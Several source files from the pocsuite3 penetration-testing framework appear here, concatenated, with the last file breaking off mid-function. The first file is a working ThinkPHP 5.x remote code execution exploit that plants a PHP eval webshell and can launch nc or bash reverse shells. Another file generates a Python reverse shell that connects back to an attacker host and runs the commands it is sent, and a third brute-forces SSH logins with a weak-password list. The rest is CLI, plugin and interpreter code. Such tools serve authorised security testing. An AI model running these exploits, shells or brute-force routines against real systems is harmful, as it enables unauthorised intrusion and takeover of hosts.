"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, REVERSE_PAYLOAD, OptDict, VUL_TYPE
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = '97715'  # ssvid
    version = '1.0'
    author = ['chenghs']
    vulDate = '2018-12-09'
    createDate = '2018-12-10'
    updateDate = '2018-12-10'
    references = ['https://www.seebug.org/vuldb/ssvid-97715']
    name = 'ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用（GetShell）'
    appPowerLink = 'http://www.thinkphp.cn/'
    appName = 'thinkphp'
    appVersion = 'thinkphp5.1.31'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新
    ，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    pocDesc = '''攻击模式下将会生成一个一句话shell，成功返回shell地址，shell密码为pass'''

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o

    def _check(self, url):
        flag = 'Registered PHP Streams'
        data = OrderedDict([
            ("function", "call_user_func_array"),
            ("vars[0]", "phpinfo"),
            ("vars[1][]", "-1")
        ])
        payloads = [
            r"/?s=admin/\think\app/invokefunction",
            r"/admin.php?s=admin/\think\app/invokefunction",
            r"/index.php?s=admin/\think\app/invokefunction",
            r"/?s=index/\think\Container/invokefunction",
            r"/index.php?s=index/\think\Container/invokefunction",
            r"/index.php?s=index/\think\app/invokefunction"
        ]
        for payload in payloads:
            vul_url = url + payload
            r = requests.post(vul_url, data=data)

            if flag in r.text:
                return payload, dict(data)
        return False

    def _verify(self):
        result = {}
        p = self._check(self.url)
        if p:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = p[0]
            result['VerifyInfo']['Postdata'] = p[1]

        return self.parse_output(result)

    def _attack(self):
        result = {}
        filename = random_str(6) + ".php"
        webshell = r'''<?php echo "green day";@eval($_POST["pass"]);?>'''

        p = self._check(self.url)
        if p:
            data = p[1]
            data["vars[1][]"] = "echo%20%27{content}%27%20>%20{filename}".format(filename=filename,
                                                                                 content=quote(webshell))
            data["vars[0]"] = "system"
            vulurl = self.url + p[0]
            requests.post(vulurl, data=data)
            r = requests.get(self.url + "/" + filename)
            if r.status_code == 200 and "green day" in r.text:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = self.url + "/" + filename
                result['ShellInfo']['Content'] = webshell
        if not result:
            vulurl = self.url + r"/index.php?s=index/\think\template\driver\file/write&cacheFile={filename}&content={content}"
            vulurl = vulurl.format(filename=filename, content=quote(webshell))
            requests.get(vulurl)
            r = requests.get(self.url + "/" + filename)
            if r.status_code == 200 and "green day" in r.text:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = self.url + "/" + filename
                result['ShellInfo']['Content'] = webshell

        return self.parse_output(result)

    def _shell(self):
        # cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
        cmd = self.get_option("command")
        p = self._check(self.url)
        if p:
            data = p[1]
            data["vars[0]"] = "system"
            data["vars[1][]"] = cmd
            vulurl = self.url + p[0]
            requests.post(vulurl, data=data)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



from .base import ShellCode


class PythonShellCode(ShellCode):
    """
        Class with shellcodes for python language
    """

    def __init__(self, connect_back_ip='localhost', connect_back_port=5555):
        ShellCode.__init__(self, connect_back_ip=connect_back_ip, connect_back_port=connect_back_port)

    def get_python_code(self, bad_chars):
        """
            Function to get python shellcode
        """

        if not self.connect_back_ip or not self.connect_back_port:
            print("Settings for connect back listener must be defined")
            return False

        python_code = """
        #!/usr/bin/python
        import socket,subprocess
        HOST = '{{LOCALHOST}}'    # The remote host
        PORT = {{LOCALPORT}}      # The same port as used by the server
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # connect to attacker machine
        s.connect((HOST, PORT))
        # send we are connected
        s.send('[*] Connection Established!')
        # start loop
        while 1:
            # recieve shell command
            data = s.recv(1024)
            print data
            # if its quit, then break out and close socket
            if data == 'quit' or data == 'q':
                break
            # do shell command
            proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            # read output
            stdout_value = proc.stdout.read() + proc.stderr.read()
            # send output to attacker
            s.send(stdout_value)
        # close socket
        s.close()
        """

        python_code = self.format_shellcode(python_code)
        return python_code

    def get_shellcode(self, inline=False):
        shell = self.get_python_code(self.bad_chars)
        if inline:
            shell = self.make_inline(shell)
        return shell



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""

import itertools
import logging
import queue
import socket

import paramiko

from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.threads import run_threads


class DemoPOC(POCBase):
    vulID = '89688'
    version = '3'
    author = ['seebug']
    vulDate = '2018-09-18'
    createDate = '2018-09-18'
    updateDate = '2018-09-18'
    references = ['https://www.seebug.org/vuldb/ssvid-89688']
    name = 'SSH 弱密码'
    appPowerLink = ''
    appName = 'ssh'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''ssh 存在弱密码，导致攻击者可连接主机进行恶意操作'''
    samples = ['']
    install_requires = ['paramiko']
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.SSH

    def _verify(self):
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 22

        task_queue = queue.Queue()
        result_queue = queue.Queue()
        ssh_burst(host, port, task_queue, result_queue)
        if not result_queue.empty():
            username, password = result_queue.get()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Username'] = username
            result['VerifyInfo']['Password'] = password
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')

        return output


def get_word_list():
    common_username = ('ssh', 'test', 'root', 'guest', 'admin', 'daemon', 'user')
    with open(paths.WEAK_PASS) as f:
        return itertools.product(common_username, f)


def port_check(host, port=22):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect_ex((host, int(port)))
    if connect == 0:
        return True
    else:
        s.close()
        return False


def ssh_login(host, port, username, password):
    ret = False
    ssh = None
    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(host, port, username, password, timeout=6)
        ret = True
    except Exception:
        pass
    finally:
        if ssh:
            ssh.close()
    return ret


def task_init(host, port, task_queue, reqult_queue):
    for username, password in get_word_list():
        task_queue.put((host, port, username.strip(), password.strip()))


def task_thread(task_queue, result_queue):
    while not task_queue.empty():
        host, port, username, password = task_queue.get()
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, username, password))
        if ssh_login(host, port, username, password):
            with task_queue.mutex:
                task_queue.queue.clear()
            result_queue.put((username, password))


def ssh_burst(host, port, task_queue, result_queue):
    log = paramiko.util.logging.getLogger()
    log.setLevel(logging.CRITICAL)

    if not port_check(host, port):
        logger.warning("{}:{} is unreachable".format(host, port))
        return
    try:
        task_init(host, port, task_queue, result_queue)
        run_threads(4, task_thread, args=(task_queue, result_queue))
    except Exception:
        pass


register_poc(DemoPOC)



import os
import sys
import threading
import time
import traceback

try:
    import pocsuite3
except ImportError:
    sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))

from pocsuite3.lib.core.option import init
from pocsuite3.lib.core.option import init_options
from pocsuite3.lib.core.exception import PocsuiteUserQuitException, PocsuiteSystemException
from pocsuite3.lib.core.exception import PocsuiteShellQuitException
from pocsuite3.lib.core.common import set_paths
from pocsuite3.lib.core.common import banner
from pocsuite3.lib.core.common import data_to_stdout
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.parse.cmd import cmd_line_parser
from pocsuite3.lib.controller.controller import start


def module_path():
    """
    This will get us the program's directory
    """
    return os.path.dirname(os.path.realpath(__file__))


def check_environment():
    try:
        os.path.isdir(module_path())
    except Exception:
        err_msg = "your system does not properly handle non-ASCII paths. "
        err_msg += "Please move the pocsuite's directory to the other location"
        logger.critical(err_msg)
        raise SystemExit


def main():
    """
    @function Main function of pocsuite when running from command line.
    """
    try:
        check_environment()
        set_paths(module_path())
        banner()

        init_options(cmd_line_parser().__dict__)

        data_to_stdout("[*] starting at {0}\n\n".format(time.strftime("%X")))
        init()
        try:
            start()
        except threading.ThreadError:
            raise

    except PocsuiteUserQuitException:
        pass

    except PocsuiteShellQuitException:
        pass

    except PocsuiteSystemException:
        pass

    except KeyboardInterrupt:
        pass

    except EOFError:
        pass

    except SystemExit:
        pass

    except Exception:
        exc_msg = traceback.format_exc()
        data_to_stdout(exc_msg)
        raise SystemExit

    finally:
        data_to_stdout("\n[*] shutting down at {0}\n\n".format(time.strftime("%X")))


if __name__ == "__main__":
    main()



from pocsuite3.api import PluginBase
from pocsuite3.api import PLUGIN_TYPE
from pocsuite3.api import logger
from pocsuite3.api import register_plugin


class TargetFromRedis(PluginBase):
    category = PLUGIN_TYPE.TARGETS

    @staticmethod
    def get_redis(redis_url=None):
        ret = None
        try:
            import os
            from redis import Redis

            if redis_url is None:
                if 'REDIS_URL' in os.environ:
                    redis_url = os.environ.get('REDIS_URL', 'redis://@localhost:6379/0')
                else:
                    redis_url = 'redis://@localhost:6379/0'

            redis = Redis.from_url(redis_url)
            redis.ping()
            ret = redis

        except ImportError:
            error_msg = 'try "pip install redis" first!'
            logger.error(error_msg)
            raise

        except Exception as ex:
            logger.error(str(ex))
            raise

        return ret

    def init(self):
        r = self.get_redis()
        if r:
            key = 'pocsuite_target'
            info_msg = "[PLUGIN] try fetch targets from redis..."
            logger.info(info_msg)

            targets = r.get(key)
            count = 0
            if targets:
                for target in targets:
                    if self.add_target(target):
                        count += 1

            info_msg = "[PLUGIN] get {0} target(s) from redis".format(count)
            logger.info(info_msg)


register_plugin(TargetFromRedis)



#!usr/bin/env python  
# -*- coding:utf-8 -*-
""" 
@author: longofo
@file: war.py 
@time: 2020/03/18 
"""
import os

from pocsuite3.lib.helper.archieve.memoryzip import InMemoryZip
from pocsuite3.lib.helper.archieve.zip import Zip


class InMemoryWar(InMemoryZip):
    def __init__(self, use_default_template=False):
        InMemoryZip.__init__(self)
        self.create_archieve(use_default_template)

    def create_archieve(self, use_default_template):
        if use_default_template:
            base_web_xml = '<?xml version="1.0" encoding="UTF-8"?>' + '\n' + \
                           '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"' + '\n' + \
                           '         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' + '\n' + \
                           '         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"' + '\n' + \
                           '         version="4.0">' + '\n' + \
                           '<welcome-file-list> ' + '\n' + \
                           '    <welcome-file>index.jsp</welcome-file> ' + '\n' + \
                           '    <welcome-file>index.html</welcome-file> ' + '\n' + \
                           '</welcome-file-list> ' + '\n' + \
                           '</web-app>'
            self.add_file("WEB-INF/web.xml", base_web_xml)
            self.add_file("index.html", "index page")


class War(Zip):
    def __init__(self, filename='', use_default_template=False):
        super().__init__(filename)

        if use_default_template:
            self.create_template()

    def create_template(self):
        base_web_xml = '<?xml version="1.0" encoding="UTF-8"?>' + '\n' + \
                       '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"' + '\n' + \
                       '         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' + '\n' + \
                       '         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"' + '\n' + \
                       '         version="4.0">' + '\n' + \
                       '<welcome-file-list> ' + '\n' + \
                       '    <welcome-file>index.jsp</welcome-file> ' + '\n' + \
                       '    <welcome-file>index.html</welcome-file> ' + '\n' + \
                       '</welcome-file-list> ' + '\n' + \
                       '</web-app>'
        self.add_file("WEB-INF/web.xml", base_web_xml)
        self.add_file("index.html", "index page")

    def get_raw(self, remove_temp=False):
        if not self.name:
            print('You should create war file before get raw content')
        with open(self.name, 'rb') as f:
            content = f.read()
        if remove_temp:
            os.remove(self.name)
        return content

    def get_war(self):
        return self.name


if __name__ == '__main__':
    memory_war = InMemoryWar(use_default_template=True)
    memory_war.add_file("classes/my.class", b"43535assd")
    memory_war.add_file("shell.jsp", "shell jsp")
    memory_war.write_to_file("../../../../mymemory_war.war")
    memory_war_context = memory_war.read()
    print(memory_war_context)

    war = War("../../../../mywar.war", use_default_template=True)
    war.add_file("classes/my.class", b"43535assd")
    war.add_file("shell.jsp", "shell jsp")
    war_context = war.get_raw()
    print(war_context)



import os

from pocsuite3.lib.core.common import is_pocsuite3_poc, single_time_warn_message
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.register import load_string_to_module, load_file_to_module


class PluginBase(object):

    def __init__(self):
        pass

    def get_category(self):
        return self.category

    def add_target(self, target):
        ret = False
        if isinstance(target, bytes):
            target = target.decode()

        if isinstance(target, str):
            kb.targets.add(target)
            ret = True
        else:
            err_msg = "[PLUGIN] invalid target format: {0}".format(target)
            logger.error(err_msg)

        return ret

    def add_poc(self, poc, fullname=None):
        ret = False
        poc = self.format_poc(poc)
        if self.check_poc(poc):
            try:
                load_string_to_module(poc, fullname)
                ret = True
            except Exception as ex:
                msg = "[PLUGIN] load PoC script failed: {0}".format(str(ex))
                single_time_warn_message(msg)
        else:
            err_msg = "[PLUGIN] invalid pocsuite3 PoC code"
            logger.error(err_msg)
        return ret

    def add_poc_from_file(self, filename):
        ret = False

        if os.path.exists(filename):
            try:
                load_file_to_module(filename)
                ret = True
            except SystemExit:
                pass
            except Exception as ex:
                msg = "[PLUGIN] load PoC script failed: {0}".format(str(ex))
                single_time_warn_message(msg)
        else:
            err_msg = "[PLUGIN] invalid pocsuite3 PoC file {}".format(filename)
            logger.error(err_msg)
        return ret

    @staticmethod
    def format_poc(poc):
        if isinstance(poc, bytes):
            poc = poc.decode()
        return poc

    @staticmethod
    def check_poc(poc):
        return is_pocsuite3_poc(poc)

    @staticmethod
    def get_results():
        return kb.results

    def init(self):
        raise NotImplementedError

    def start(self):
        raise NotImplementedError

    def handle(self, output):
        pass


def register_plugin(plugin_class):
    plugin_name = plugin_class.__module__.split('.')[0]
    plugin_category = plugin_class.category

    if plugin_name not in kb.plugins[plugin_category]:
        kb.plugins[plugin_category][plugin_name] = plugin_class()



import unittest
from pocsuite3.api import init_pocsuite
from pocsuite3.api import start_pocsuite
from pocsuite3.api import get_results


class TestCase(unittest.TestCase):
    def setUp(self):
        self.config = {
            'url': 'http://127.0.0.1:8080',
            'poc': 'ecshop_rce',
        }
        init_pocsuite(self.config)

    def tearDown(self):
        pass

    def verify_result(self):
        result = get_results().pop()
        self.assertTrue(result[5] == 'success')

    @unittest.skip(reason='test')
    def test_import_run(self):
        start_pocsuite()
        self.verify_result()



import os
import unittest
from configparser import ConfigParser
from optparse import OptionParser, OptionGroup

from pocsuite3.api import paths


class TestCase(unittest.TestCase):
    def setUp(self):
        self.root = paths.POCSUITE_ROOT_PATH
        self.path = os.path.join(self.root, "../pocsuite_test.ini")
        self.path2 = os.path.join(self.root, "../pocsuite.ini")

    def tearDown(self):
        if os.path.isfile(self.path):
            os.remove(self.path)

    def test_build_ini(self):
        config = ConfigParser(allow_no_value=True)

        usage = "pocsuite [options]"
        parser = OptionParser(usage=usage)
        try:
            parser.add_option("--version", dest="show_version", action="store_true",
                              help="Show program's version number and exit")

            parser.add_option("--update", dest="update_all", action="store_true",
                              help="Update Pocsuite")

            parser.add_option("-v", dest="verbose", type="int", default=1,
                              help="Verbosity level: 0-6 (default 1)")

            # Target options
            target = OptionGroup(parser, "Target", "At least one of these "
                                                   "options has to be provided to define the target(s)")
            target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")")

            target.add_option("-f", "--file", dest="url_file", help="Scan multiple targets given in a textual file")
            target.add_option("-r", dest="poc", help="Load POC file from local or remote from seebug website")
            target.add_option("-c", dest="configFile", help="Load options from a configuration INI file")

            # Mode options
            mode = OptionGroup(parser, "Mode", "Pocsuite running mode options")

            mode.add_option("--verify", dest="mode", default='verify', action="store_const", const='verify',
                            help="Run poc with verify mode")

            mode.add_option("--attack", dest="mode", action="store_const", const='attack',
                            help="Run poc with attack mode")
            mode.add_option("--shell", dest="mode", action="store_const", const='shell',
                            help="Run poc with shell mode")
            # Requests options
            request = OptionGroup(parser, "Request", "Network request options")
            request.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
            request.add_option("--host", dest="host", help="HTTP Host header value")
            request.add_option("--referer", dest="referer", help="HTTP Referer header value")
            request.add_option("--user-agent", dest="agent", help="HTTP User-Agent header value")
            request.add_option("--random-agent", dest="random_agent", action="store_true", default=False,
                               help="Use randomly selected HTTP User-Agent header value")
            request.add_option("--proxy", dest="proxy", help="Use a proxy to connect to the target URL")
            request.add_option("--proxy-cred", dest="proxy_cred",
                               help="Proxy authentication credentials (name:password)")
            request.add_option("--timeout", dest="timeout",
                               help="Seconds to wait before timeout connection (default 30)")
            request.add_option("--retry", dest="retry", default=False, help="Time out retrials times.")
            request.add_option("--delay", dest="delay", help="Delay between two request of one thread")
            request.add_option("--headers", dest="headers", help="Extra headers (e.g. \"key1: value1\\nkey2: value2\")")
            # Account options
            account = OptionGroup(parser, "Account", "Telnet404 account options")
            account.add_option("--login-user", dest="login_user", help="Telnet404 login user")
            account.add_option("--login-pass", dest="login_pass", help="Telnet404 login password")
            # Modules options
            modules = OptionGroup(parser, "Modules", "Modules(Seebug Zoomeye CEye Listener) options")
            modules.add_option("--dork", dest="dork", action="store", default=None,
                               help="Zoomeye dork used for search.")
            modules.add_option("--max-page", dest="max_page", type=int, default=1,
                               help="Max page used in ZoomEye API(10 targets/Page).")
            modules.add_option("--search-type", dest="search_type", action="store", default='host',
                               help="search type used in ZoomEye API, web or host")
            modules.add_option("--vul-keyword", dest="vul_keyword", action="store", default=None,
                               help="Seebug keyword used for search.")
            modules.add_option("--ssv-id", dest="ssvid", action="store", default=None,
                               help="Seebug SSVID number for target PoC.")
            modules.add_option("--lhost", dest="connect_back_host", action="store", default=None,
                               help="Connect back host for target PoC in shell mode")
            modules.add_option("--lport", dest="connect_back_port", action="store", default=None,
                               help="Connect back port for target PoC in shell mode")

            # Optimization options
            optimization = OptionGroup(parser, "Optimization", "Optimization options")
            optimization.add_option("--plugins", dest="plugins", action="store", default=None,
                                    help="Load plugins to execute")
            optimization.add_option("--pocs-path", dest="pocs_path", action="store", default=None,
                                    help="User defined poc scripts path")
            optimization.add_option("--threads", dest="threads", type=int, default=1,
                                    help="Max number of concurrent network requests (default 1)")
            optimization.add_option("--batch", dest="batch",
                                    help="Automatically choose defaut choice without asking.")
            optimization.add_option("--requires", dest="check_requires", action="store_true", default=False,
                                    help="Check install_requires")
            optimization.add_option("--quiet", dest="quiet", action="store_true", default=False,
                                    help="Activate quiet mode, working without logger.")

            # Diy options
            diy_options = OptionGroup(parser, "Poc options", "definition options for PoC")

            parser.add_option_group(target)
            parser.add_option_group(mode)
            parser.add_option_group(request)
            parser.add_option_group(account)
            parser.add_option_group(modules)
            parser.add_option_group(optimization)
            parser.add_option_group(diy_options)

        except Exception as e:
            print(Exception, e)

        d = parser.__dict__
        optiondict = {}
        for group in d["option_groups"]:
            desc = group.description
            title = group.title
            # print(desc, title)
            # config.add_section("; " + desc)
            config.add_section(title)
            optiondict[title] = {}
            for item in group.option_list:
                _type = item.type
                dest = item.dest
                help = item.help
                default = item.default
                if isinstance(default, tuple) and default == ('NO', 'DEFAULT'):
                    default = ''
                print(_type, dest, default)
                config.set(title, '; ' + help)
                config.set(title, dest, str(default))
                optiondict[title][dest] = _type
        with open(self.path, 'w') as fp:
            config.write(fp)

        config.read(self.path)
        print(optiondict)
        self.assertTrue(len(config.items("Target")) > 1)

    def test_read_ini(self):
        config = ConfigParser()
        config.read(self.path2)
        sections = config.sections()
        for section in sections:
            options = config.items(section)
            if options:
                for key, value in options:
                    print(key, type(value))



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time    : 2018/12/25 上午10:58
# @Author  : chenghs
# @File    : interpreter.py
import os
import re

from pocsuite3.lib.controller.controller import start
from pocsuite3.lib.core.common import banner, index_modules, data_to_stdout, humanize_path, module_required, \
    get_poc_name, stop_after, get_local_ip, is_ipv6_address_format, rtrim, ltrim
from pocsuite3.lib.core.data import logger, paths, kb, conf
from pocsuite3.lib.core.enums import POC_CATEGORY, AUTOCOMPLETE_TYPE
from pocsuite3.lib.core.exception import PocsuiteBaseException, PocsuiteShellQuitException
from pocsuite3.lib.core.option import _set_listener, _set_http_referer, _set_http_user_agent, _set_network_proxy, \
    _set_network_timeout
from pocsuite3.lib.core.register import load_file_to_module
from pocsuite3.lib.core.settings import IS_WIN
from pocsuite3.lib.core.shell import auto_completion, readline
from pocsuite3.thirdparty.prettytable import prettytable
from pocsuite3.thirdparty.termcolor.termcolor import colored


class BaseInterpreter(object):
    global_help = ""

    def __init__(self):
        self.setup()
        self.banner = ""
        self.complete = None

    def setup(self):
        """ Initialization of third-party libraries

        Setting interpreter history.
        Setting appropriate completer function.

        :return:
        """
        auto_completion(completion=AUTOCOMPLETE_TYPE.CONSOLE, console=self.complete)

    def parse_line(self, line):
        """ Split line into command and argument.

        :param line: line to parse
        :return: (command, argument)
        """
        command, _, arg = line.strip().partition(" ")
        return command, arg.strip()

    @property
    def prompt(self):
        """ Returns prompt string """
        return ">>>"

    def get_command_handler(self, command):
        """ Parsing command and returning appropriate handler.

        :param command: command
        :return: command_handler
        """
        try:
            command_handler = getattr(self, "command_{}".format(command))
        except AttributeError:
            raise PocsuiteBaseException("Unknown command: '{}'".format(command))

        return command_handler

    def start(self):
        """ Routersploit main entry point. Starting interpreter loop. """

        while True:
            try:
                command, args = self.parse_line(input(self.prompt))
                command = command.lower()
                if not command:
                    continue
                command_handler = self.get_command_handler(command)
                command_handler(args)
            except PocsuiteBaseException as err:
                logger.error(err)
            except EOFError:
                logger.info("Pocsuite stopped")
                break
            except KeyboardInterrupt:
                logger.info("User Quit")
                break

    def complete(self, text, state):
        """Return the next possible completion for 'text'.

        If a command has not been entered, then complete against command list.
        Otherwise try to call complete_<command> to get list of completions.
        """
        if state == 0:
            original_line = readline.get_line_buffer()
            line = original_line.lstrip()
            stripped = len(original_line) - len(line)
            start_index = readline.get_begidx() - stripped
            end_index = readline.get_endidx() - stripped

            if start_index > 0:
                cmd, args = self.parse_line(line)
                if cmd == "":
                    complete_function = self.default_completer
                else:
                    try:
                        complete_function = getattr(self, "complete_" + cmd)
                    except AttributeError:
                        complete_function = self.default_completer
            else:
                complete_function = self.raw_command_completer

            self.completion_matches = complete_function(text, line, start_index, end_index)

        try:
            return self.completion_matches[state]
        except IndexError:
            return None

    def commands(self, *ignored):
        """ Returns full list of interpreter commands.

        :param ignored:
        :return: full list of interpreter commands
        """
        return [command.rsplit("_").pop() for command in dir(self) if command.startswith("command_")]

    def raw_command_completer(self, text, line, start_index, end_index):
        """ Complete command w/o any argument """
        return [command for command in self.suggested_commands() if command.startswith(text)]

    def default_completer(self, *ignored):
        return []

    def suggested_commands(self):
        """ Entry point for intelligent tab completion.

        Overwrite this method to suggest suitable commands.

        :return: list of suitable commands
        """
        return self.commands()


class PocsuiteInterpreter(BaseInterpreter):
    global_help = """Global commands:
    help                        Print this help menu
    use <module>                Select a module for usage
    search <search term>        Search for appropriate module
    list|show all               Show all available pocs
    exit                        Exit Pocsuite3"""

    module_help = """Module commands:
    run                                 Run the selected module with the given options
    back                                De-select the current module
    set <option name> <option value>    Set an option for the selected module
    setg <option name> <option value>   Set an option for all of the modules
    show [info|options|all]             Print information, options
    check                               Check if a given target is vulnerable to a selected module's attack
    attack                              Attack target and return target vulnerable infomation
    exploit                             Get a shell from remote target"""

    def __init__(self):
        super(PocsuiteInterpreter, self).__init__()

        self.current_module = None
        self.raw_prompt_template = None
        self.module_prompt_template = None
        self.prompt_hostname = "Pocsuite3"
        self.show_sub_commands = (
            "info", "options", "ip", "all")

        self.global_commands = sorted(["use ", "help", "exit", "show ", "search "])
        self.module_commands = ["run", "back", "set ", "setg ", "check"]
        self.module_commands.extend(self.global_commands)
        self.module_commands.sort()

        self.modules = index_modules()
        self.modules_count = len(self.modules)
        # init
        conf.console_mode = True
        banner()
        logger.info("Load Pocs :{}".format(self.modules_count))

        self.last_search = []
        self.last_ip = []
        self.main_modules_dirs = []
        for module in self.modules:
            temp_module = module
            if IS_WIN:
                temp_module = temp_module.replace("/", "\\")
                temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("\\")
            temp_module = temp_module.replace(paths.POCSUITE_ROOT_PATH, "").lstrip("/")
            self.main_modules_dirs.append(temp_module)

        self.__parse_prompt()

    def __parse_prompt(self):
        raw_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 > "
        self.raw_prompt_template = raw_prompt_default_template
        module_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 (\001\033[91m\002{module}\001\033[0m\002) > "
        self.module_prompt_template = module_prompt_default_template

    @property
    def module_metadata(self):
        return getattr(self.current_module, "pocsuite3_module_path")

    @property
    def prompt(self):
        """ Returns prompt string based on current_module attribute.

        Adding module prefix (module.name) if current_module attribute is set.

        :return: prompt string with appropriate module prefix.
        """
        if self.current_module:
            try:
                return self.module_prompt_template.format(host=self.prompt_hostname,
                                                          module=self.module_metadata)
            except (AttributeError, KeyError):
                return self.module_prompt_template.format(host=self.prompt_hostname, module="UnnamedModule")
        else:
            return self.raw_prompt_template.format(host=self.prompt_hostname)

    def command_show(self, *args, **kwargs):
        sub_command = args[0]
        func = "_show_" + sub_command
        if not hasattr(self, func):
            logger.warning("Unknown 'show' sub-command '{}'. "
                           "What do you want to show?\n"
                           "Possible choices are: {}".format(sub_command, self.show_sub_commands))
            return
        getattr(self, func)(*args, **kwargs)

    def command_exit(self, *args, **kwargs):
        raise EOFError

    def command_help(self, *args, **kwargs):
        data_to_stdout(self.global_help)
        data_to_stdout("\n")
        if self.current_module:
            data_to_stdout("\n")
            data_to_stdout(self.module_help)
            data_to_stdout("\n")

    def _show_ip(self, *args, **kwargs):
        self.last_ip = []
        ips = get_local_ip(all=True)
        tb = prettytable.PrettyTable(["Index", "IP"])
        index = 0
        for item in ips:
            tb.add_row([str(index), item])
            self.last_ip.append(item)
            index += 1
        data_to_stdout("\n" + tb.get_string() + "\n")

    def command_back(self, *args, **kwargs):
        self.current_module = None

    def command_q(self, *args, **kwargs):
        if self.current_module:
            self.command_back(args, kwargs)
        else:
            self.command_exit(args, kwargs)

    def command_search(self, *args, **kwargs):
        keyword = args[0]

        if not keyword:
            logger.warning("Please specify search keyword. e.g. 'search wordpress'")
            return

        tb = prettytable.PrettyTable()
        tb.field_names = ["Index", "Path"]

        search_result = []
        for module in self.main_modules_dirs:
            m = re.search(keyword, module, re.I | re.S)
            if m:
                search_result.append((module, m.group(0)))

        index = 0
        for s, k in search_result:
            tb.add_row([index, "{}\033[31m{}\033[0m{}".format(*s.partition(k))])
            index = index + 1

        self.last_search = [i for i, j in search_result]
        data_to_stdout(tb.get_string())
        data_to_stdout("\n")

    def command_use(self, module_path, *args, **kwargs):
        if module_path.isdigit():
            index = int(module_path)
            if index >= len(self.last_search):
                logger.warning("Index out of range")
                return
            module_path = self.last_search[index]
        if not module_path.endswith(".py"):
            module_path = module_path + ".py"
        if not os.path.exists(module_path):
            module_path = os.path.join(paths.POCSUITE_ROOT_PATH, module_path)
            if not os.path.exists(module_path):
                errMsg = "No such file: '{0}'".format(module_path)
                logger.error(errMsg)
                return
        try:
            load_file_to_module(module_path)
            self.current_module = kb.current_poc
            self.current_module.pocsuite3_module_path = ltrim(rtrim(module_path, ".py"),
                                                              os.path.join(paths.POCSUITE_ROOT_PATH, ""))
        except Exception as err:
            logger.error(str(err))

    @module_required
    def command_set(self, *args, **kwargs):
        key, _, value = args[0].partition(" ")
        if key in self.current_module.options:
            self.current_module.set_option(key, value)
            logger.info("{} => {}".format(key, value))
        elif key in self.current_module.global_options:
            self.current_module.setg_option(key, value)
            logger.info("{} => {}".format(key, value))
        elif key in self.current_module.payload_options:
            if value.isdigit():
                index = int(value)
                if index >= len(self.last_ip):
                    logger.warning("Index out of range")
                    return
                value = self.last_ip[index]
            self.current_module.setp_option(key, value)
            logger.info("{} => {}".format(key, value))
        else:
            logger.error("You can't set option '{}'."
                         .format(key))

    def _attack_mode(self, mod):
        """
        根据不同模式发起不同的验证

        :param mod: 模式类型 verify|attack|shell
        :return:
        """
        # 设置全局参数
        if self.current_module.current_protocol == POC_CATEGORY.PROTOCOL.HTTP:
            target = self.current_module.getg_option("target")
        else:
            rhost = self.current_module.getg_option("rhost")
            rport = self.current_module.getg_option("rport")
            ssl = self.current_module.getg_option("ssl")
            scheme = "http"
            if ssl:
